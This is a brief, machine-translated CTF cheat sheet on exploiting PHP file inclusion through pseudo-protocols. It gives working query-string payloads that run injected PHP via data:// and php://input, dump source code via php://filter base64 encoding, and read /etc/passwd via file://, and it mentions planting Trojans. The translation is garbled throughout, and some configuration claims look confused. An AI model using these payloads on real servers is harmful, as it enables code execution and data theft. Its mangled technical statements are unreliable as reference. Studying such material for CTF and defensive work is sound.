File Inclusion Vulnerabilities can use a variety of pseudo-protocol
0x01 file containing the function
php function which will cause the file that contains the vulnerability: the include , The require, include_once, require_once, highlight_file, show_source, ReadFile, file_get_contents , fopen, File
php, data files and reading the dummy code execution protocol by:
? 1. File = Data: text / Plain, <PHP? The phpinfo ()?> # The GET data 2.? File = Data: text / Plain; base64, PD9waHAgcGhwaW5mbygpPz4 = # behind base64 characters are required string passed base64 encoding 3.? File = PHP: // INPUT [the POST the dATA:] <? PHP the phpinfo ()?> #POST data 4.? File = PHP: // filter / Read = convert.base64-encode / Resource = XXX .php #get read source code
0x02 php pseudo-protocol
Allow_url_fopen need to open the: php: // input, php: // stdin, php: // memory and php: // temp
No need to open the allow_wrl_fopen: php: // filter
Often used in the CTF is php: // filter and php: // input
php: // filter for reading source, php: // input php code for performing
php: // input needs to post a request to submit data
php: // filter can get submit a = php:? //filter/read=convert.base64-encode/resource=xxx.php
0x03 data pseudo-protocol
ctf common:
? xxx = the Data: // text / Plain; Base64, want to file_get_contents () base64 encoding function returns a value of
?file=data:text/plain,<?php phpinfo()?>
0x04 file protocol
File: // access to the local file system
file: // for access to the local file system, such as c: disk thing. Generally in the CTF to read local files, unaffected by the allow_url_fopen and allow_url_include.
file: // [absolute path and file name of the file]
linux system environment: ? File = File: /// etc / passwd
Under winows system environment: ? File = File: /// E: \ phpStudy \ the WWW \ code \ phpinfo.php
Pseudo-protocol summary
File System protocol is used to read the file, c disk key elements. Php: // filter is used to read the contents of the file, but after going to base64 out, otherwise it will create a file in order to execute only see the results. Php: // input (code execution) data post request may be executed as PHP code. It can be used to write Trojans. Data input and similar, you can code execution, but only in php <5.3 can be written and include the Trojan when = on.
Reference connection: https: //blog.csdn.net/weixin_43272781/article/details/94645507
https://www.cnblogs.com/Oran9e/p/7795057.html